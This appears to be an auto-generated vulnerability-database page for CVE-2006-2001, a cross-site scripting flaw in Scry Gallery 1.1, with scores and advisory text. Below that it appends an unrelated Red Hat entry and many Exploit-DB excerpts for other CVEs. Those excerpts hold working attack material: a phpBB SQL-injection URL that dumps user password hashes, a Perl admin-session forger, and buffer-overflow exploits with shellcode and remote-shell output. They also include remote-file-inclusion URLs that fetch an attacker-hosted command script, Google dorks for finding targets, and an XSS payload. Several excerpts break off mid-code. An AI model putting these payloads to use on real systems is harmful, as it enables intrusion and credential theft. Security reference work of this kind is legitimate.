CVE-2006-2001
Published 2006-04-25
Priority: P4 · 19 · medium · CVSS 2.0 base score 4.3
Vector: AV:N/AC:M/Au:N/C:N/I:P/A:N
EXPLOIT (public exploit indexed)
EPSS: 2.30% (81.1th percentile)
Cross-site scripting (XSS) vulnerability in index.php in Scry Gallery 1.1 allows remote attackers to inject arbitrary web script or HTML via the p parameter. NOTE: this is a different vulnerability than the directory traversal vector.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| scry_gallery | scry_gallery | — | — |
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 2.0 | 4.3 | MEDIUM | AV:N/AC:M/Au:N/C:N/I:P/A:N |
| vendor_redhat | — | 9.3 | CRITICAL | — |
GHSA
GHSA-w8qm-qm5m-qp68 · ghsa_unreviewed · 2022-05-01 · CVE-2006-2001 [MEDIUM]
Cross-site scripting (XSS) vulnerability in index.php in Scry Gallery 1.1 allows remote attackers to inject arbitrary web script or HTML via the p parameter. NOTE: this is a different vulnerability than the directory traversal vector.
Red Hat
CVE-2006-1017 [CRITICAL] · vendor_redhat · CVSS 9.3
The c-client library 2000, 2001, or 2004 for PHP before 4.4.4 and 5.x before 5.1.5 do not check the (1) safe_mode or (2) open_basedir functions, and when used in applications that accept user-controlled input for the mailbox argument to the imap_open function, allow remote attackers to obtain access to an IMAP stream data structure and conduct unauthorized IMAP actions.
Statement: We do not consider safe_mode / open_basedir restriction bypass issues to be security sensitive. For more details see http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=169857#c1 and http://www.php.net/security-note.php
No detection rules found.
Exploit-DB
CVE-2008-1350 Fully Modded phpBB - 'kb.php' SQL Injection
exploitdb·2008-03-12
---
# Powered by phpBB © 2001, 2006 phpBB Group
# Modified by Fully Modded phpBB © 2002, 2006
#
#########################################################################
#
# AUTHOR : TurkishWarriorr
#
# HOME : http://www.1923turk.org
#
#########################################################################
#
# DORKS 1 : allinurl :kb.php?mode=article&k
# DORKS 2 : article&k=
# DORKS 3 : "Powered by phpBB © 2001, 2006 phpBB Group" "Modified by Fully Modded phpBB © 2002, 2006"
#
##########################################################################
EXPLOIT :
kb.php?mode=article&k=-1+union+select+1,1,concat(user_id,char(58),username,char(58),user_password),4,5,6,7,8,9,10,11,12,13+from+phpbb_users+where+user_id+=2&page_num=2&cat=1
#####
Exploit-DB
CVE-2007-0845 Advanced Poll 2.0.5-dev - Remote Admin Session Generator
exploitdb·2007-02-07
---
#!/usr/bin/perl -w
# Advanced Poll 2.0.0 >= 2.0.5-dev textfile admin session gen.
#
#
# 0day! KEEP IT PRIVATE 0day!
#
# date: 30/07/06
#
# diwou
#
# PHCKSEC (c) 2001-2006.
#
# see templates for code execution ;).
use strict;
use warnings;
use LWP::UserAgent;
use MD5;
my ($lwp,$agent,$out,$url,$proxy)=(undef,undef,undef,$ARGV[0],$ARGV[1]);
my %zday=
(
username => 'jakahw4nk4h',
'pollvars[poll_username]' => 'jakahw4nk4h',
password => 'fuckoff',
'pollvars[poll_password]' => ''
);
$zday{'pollvars[poll_password]'}=&md5($zday{password});
$agent="Hey IDS! i'm gonna fuck your advanced poll right? B===D"; # post method doesnt log it, so doesnt matter.
#$agent="Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.1) Gecko/20060124 Firefox/
Exploit-DB
CVE-2006-6652 NetBSD - 'FTPd / Tnftpd' Remote Stack Overflow (PoC)
exploitdb·2006-11-30
---
#!perl
# $$$ NetBSD ftpd and ports *Remote ROOOOOT $HOLE$* $$$
#
# About
#
# tnftpd is a port of the NetBSD FTP server to other systems.
# It offers many enhancements over the traditional BSD ftpd,
# including per-class configuration directives via ftpd.conf(5),
# RFC 2389 and draft-ietf-ftpext-mlst-11 support, IPv6,
# transfer rate throttling, and more.
# tnftpd was formerly known as lukemftpd,
# and earlier versions are present in Mac OS X 10.2 (as ftpd)
# and FreeBSD 5.0 (as lukemftpd).
#
# Description
#
# The NetBSD ftpd and the tnftpd port suffer from a remote stack overrun,
# which can lead to a root compromise.
#
# The bug is in glob.c file. The globbing mechanism is flawed as back in
# 2001.
#
# To trigger the overflow you
Exploit-DB
CVE-2006-5112 NaviCOPA Web Server 2.01 - 'GET' Remote Buffer Overflow
exploitdb·2006-09-27
---
/*
navi_exp.c
NaviCOPA Web Server 2.01 0day Remote Buffer Overflow Exploit
Coded by h07
Tested on XP SP2 Polish, 2000 SP4 Polish
Example:
C:\>navi_exp 192.168.0.1 0
[*] NaviCOPA Web Server 2.01 0day Remote Buffer Overflow Exploit
[*] Coded by h07
[+] Sending buffer: OK
[*] Check your shell on 192.168.0.1:4444
[*] Press enter to quit
C:\>nc -v 192.168.0.1 4444
[192.168.0.1] 4444 (?) open
Microsoft Windows XP [Wersja 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\windows\system32>
*/
#include
#define PORT 80
#define BUFF_SIZE 1024
typedef struct
{
char os_name[32];
unsigned long ret;
} target;
char shellcode[] =
/*
Win32_bind shellcode
Encoder: PexFnstenvMov
Bad chars: 0x00 0x20 0x0a 0x0d 0x2f 0x3f
Thx metasploit.c
Exploit-DB
CVE-2006-4458 phpGroupWare 0.9.16.010 - 'GLOBALS[]' Remote Code Execution
exploitdb·2006-08-29
---
#!/usr/bin/php -q -d short_open_tag=on
calendar/inc/class.holidaycalc.inc.php line 14-33:
....
/* $Id: class.holidaycalc.inc.php,v 1.5 2001/08/26 12:32:28 skeeter Exp $ */
if (empty($GLOBALS['phpgw_info']['user']['preferences']['common']['country']))
{
$rule = 'US';
}
else
{
$rule = $GLOBALS['phpgw_info']['user']['preferences']['common']['country'];
}
$calc_include = PHPGW_INCLUDE_ROOT.'/calendar/inc/class.holidaycalc_'.$rule.'.inc.php';
if(@file_exists($calc_include))
{
include($calc_include);
}
else
{
include(PHPGW_INCLUDE_ROOT.'/calendar/inc/class.holidaycalc_US.inc.php');
}
....
ex:
http://www.site.com/[phpGroupWare_path]/calendar/inc/class.holidaycalc.inc.php?GLOBALS[phpgw_info][user][preferences][common][country]=..
Exploit-DB
CVE-2006-4318 Texas Imperial Software WFTPD 3.23 - 'SIZE' Remote Buffer Overflow
exploitdb·2006-08-21
---
/*
* wftpd_exp.c
* WFTPD server 3.23 (SIZE) 0day remote buffer overflow exploit
* coded by h07
* tested on XP SP2 polish, 2000 SP4 polish
* example..
C:\>wftpd_exp 0 0 192.168.0.2 h07 open 192.168.0.1 4444
[*] WFTPD server 3.23 (SIZE) 0day remote buffer overflow exploit
[*] coded by h07
[*] FTP response: 331 Give me your password, please
[*] FTP response: 230 Logged in successfully
[+] sending buffer: ok
[*] press enter to quit
C:\>nc -l -p 4444
Microsoft Windows XP [Wersja 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\wftpd323>
*/
#include
#include
#define BUFF_SIZE 1024
#define PORT 21
//win32 reverse shellcode (metasploit.com)
char shellcode[] =
"\x31\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x
Exploit-DB
CVE-2006-3439 Microsoft Windows - CanonicalizePathName() Remote (MS06-040)
exploitdb·2006-08-19
---
/*
Microsoft Windows CanonicalizePathName() Remote Overflow MSO6-040
More info: http://www.microsoft.com/technet/security/bulletin/MS06-040.mspx
Written by Preddy
This is another version of hdm's metasploit version but ported to C,
Works against Windows XP SP1
And it should give a crash on Win2k in services.exe
On successfull exploitation it provides a remote shell at port 54321
of your victim:
./ms06 192.168.1.103
Target: 192.168.1.103
Attack Finished: now open a new terminal and nc to your victim on port 54321
Warning: Don't close this window!
[open a new terminal/window/prompt]
nc 192.168.1.103 54321
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
http://www.te
Exploit-DB
CVE-2006-3966 MyNewsGroups 0.6b - 'myng_root' Remote Inclusion
exploitdb·2006-07-31
---
+--------------------------------------------------------------------
+
+ MyNewsGroups :) v. 0.6b <= Remote File Inclusion
+
+--------------------------------------------------------------------
+
+ Affected Software .: MyNewsGroups :) v. 0.6b
+ Vendor ............: http://mynewsgroups.sourceforge.net
+ Class .............: Remote File Inclusion
+ Risk ..............: high (Remote File Execution)
+ Found by ..........: Philipp Niedziela
+ Original advisory .: http://www.bb-pcsecurity.de/
+ Contact ...........: webmaster[at]bb-pcsecurity[.]de
+
+--------------------------------------------------------------------
+
+ Code /lib/tree/layersmenue.inc.php:
+
+ .....
+ <?php
+ // PHP Layers Menu 2.3.5 (C) 2001-2003 Marco Pratesi (marco at te
Exploit-DB
CVE-2006-3838 eIQnetworks License Manager - Remote Buffer Overflow (multi) (1)
exploitdb·2006-07-27
---
#!/usr/bin/perl -w
#
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com) - 03/23/2006
# Bug found by Titon of Bastard Labs.
#
# http://www.zerodayinitiative.com/advisories/ZDI-06-024.html
#
# Exploit for * Security Analyzer by eiQnetworks (OEM for Several vendors)
#
# kfinisterre@kfinisterre01:~$ ./eiQ_multi.pl 2 192.168.0.13
# *** Target: NetworkSecurityAnalyzerv4.2.27.exe, Len: 1262
# Exploiting 192.168.0.13
# kfinisterre@kfinisterre01:~$ telnet 192.168.0.13 4444
# Trying 192.168.0.13...
# Connected to 192.168.0.13.
# Escape character is '^]'.
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\Network Security Analyzer\fwa>exit
#
Exploit-DB
CVE-2006-2521 phpMyDirectory 10.4.4 - 'ROOT_PATH' Remote File Inclusion
exploitdb·2006-05-19
---
Title : phpMyDirectory <= 10.4.4 Remote File Inclusion Vulnerability
-
URL : http://www.phpmydirectory.com/
-
Dork : "powered by phpmydirectory" or intext:"2001-2006 phpMyDirectory.com"
-
Author : OLiBekaS
-
contact : olibekas[at]gmail.com
-
greetz : Renzokuzen, Skulmatic, weleh, brokencode, bigmaster and all #papmahackerlink crew
-
Exploit : http://[target]/[path]/cron.php?ROOT_PATH=http://[attacker]/cmd.txt?&cmd=ls
# milw0rm.com [2006-05-19]
Exploit-DB
CVE-2006-2323 phpListPro 2.01 - Multiple Remote File Inclusions
exploitdb·2006-05-08
---
Title: phpListPro <= 2.01 - Remote File Include Vulnerability
Vendor: SmartISoft
URL: http://smartisoft.com
Credits:
Discovered by: 'Aesthetico'
http://www.majorsecurity.de
Search for: "PHPListPro ©2001-2006 SmartISoft"
Exploitation:
/config.php?returnpath=http://www.yourspace.com/yourscript.txt?&ls%20-laF
/editsite.php?returnpath=http://www.yourspace.com/yourscript.txt?&ls%20-laF
/in.php?returnpath=http://www.yourspace.com/yourscript.txt?&ls%20-laF
/addsite.php?returnpath=http://mitglied.lycos.de/n0ssy/r57.txt?&cmd=ls
# milw0rm.com [2006-05-08]
Exploit-DB
CVE-2006-2001 Scry Gallery 1.1 - 'index.php' Cross-Site Scripting
exploitdb·2006-04-24
---
source: https://www.securityfocus.com/bid/17668/info
Scry Gallery is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Scry Gallery version 1.1 is vulnerable to this issue; other versions may also be affected.
http://www.example.com/[Path to scry gallery]/index.php?v=list&i=0&p=var%20variable=111111111111111111;alert(variable);
Exploit-DB
CVE-2000-1134 Apple Mac OSX 10 / HP-UX 9/10/11 / Mandriva 6/7 / RedHat 5/6 / SCO 5 / IRIX 6 - Shell Redirection Race Condition
exploitdb·2000-01-02
---
source: https://www.securityfocus.com/bid/2006/info
bash, tcsh, cash, ksh and sh are all variations of the Unix shell distributed with many Unix and Unix clone operating systems. A vulnerability exists in these shells that could allow an attacker to arbitrarily write to files.
A vulnerability has been discovered in a number of Unix shells which may allow a local attacker to corrupt files or potentially elevate privileges.
Scripts and command line operations used in an October 29th, 2001 BugTraq posting:
/tmp# echo 'hello world' > rootfile
/tmp# chmod 600 rootfile
/tmp# ln -s rootfile sh$$
/tmp# chown -h 666.666 sh$$
/tmp# ls -l rootfile sh$$
-rw------- 1 root root 12
No writeups or analysis indexed.
References
http://attrition.org/pipermail/vim/2006-April/000716.html
http://secunia.com/advisories/19777
http://securityreason.com/securityalert/783
http://www.osvdb.org/24891
http://www.securityfocus.com/archive/1/431853/100/0/threaded
http://www.securityfocus.com/bid/17668
http://www.vupen.com/english/advisories/2006/1490
https://exchange.xforce.ibmcloud.com/vulnerabilities/26101